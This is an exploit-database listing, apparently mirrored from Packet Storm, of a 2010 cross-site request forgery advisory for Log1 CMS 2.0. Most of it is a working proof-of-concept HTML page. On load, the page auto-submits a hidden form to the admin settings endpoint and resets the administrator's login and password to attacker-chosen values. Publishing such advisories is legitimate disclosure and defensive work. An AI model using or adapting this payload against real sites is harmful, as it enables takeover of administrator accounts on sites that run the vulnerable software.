Lucene search
K

Log1 CMS 2.0 Cross Site Request Forgery

🗓️ 06 Jul 2010 00:00:00Reported by AutoSec ToolsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

Log1 CMS 2.0 Cross Site Request Forgery vulnerability allows admin username and password chang

Code
`<!------------------------------------------------------------------------  
# Software................Log1 CMS 2.0  
# Vulnerability...........Cross-site Request Forgery   
# Download................http://log1cms.sourceforge.net/  
# Release Date............7/5/2010  
# Tested On...............Windows Vista + XAMPP  
# ------------------------------------------------------------------------  
# Author..................John Leitch  
# Site....................http://cross-site-scripting.blogspot.com/  
# [email protected]  
# ------------------------------------------------------------------------  
#   
# --Description--  
#   
# A cross-site request forgery vulnerability in Log1 CMS 2.0 can be  
# exploited to change the admin username and password.  
#   
#   
# --PoC-->  
  
<html>  
<body onload="document.forms[0].submit()">  
<form method="POST" action="http://localhost/log1cms2.0/admin/main.php?action=step1">  
<input type="hidden" name="title" value="log1 CMS" />  
<input type="hidden" name="desc" value="log1cms official page" />  
<input type="hidden" name="key" value="log1, log 1, CMS, content managment system" />  
<input type="hidden" name="language" value="0" />  
<input type="hidden" name="bgcolor" value="#ffffff" />  
<input type="hidden" name="textcolor" value="#999999" />  
<input type="hidden" name="specialcolor" value="#000000" />  
<input type="hidden" name="login" value="admin" />  
<input type="hidden" name="pass" value="Password1" />  
<input type="hidden" name="isMd5" value="1" />  
<input type="hidden" name="google_login" value="gerard.caplain" />  
<input type="hidden" name="email" value="log_1[ at ]users.sourceforge.net" />  
<input type="hidden" name="copyright" value="2010 by log1" />  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Jul 2010 00:00Current
0.8Low risk
Vulners AI Score0.8
29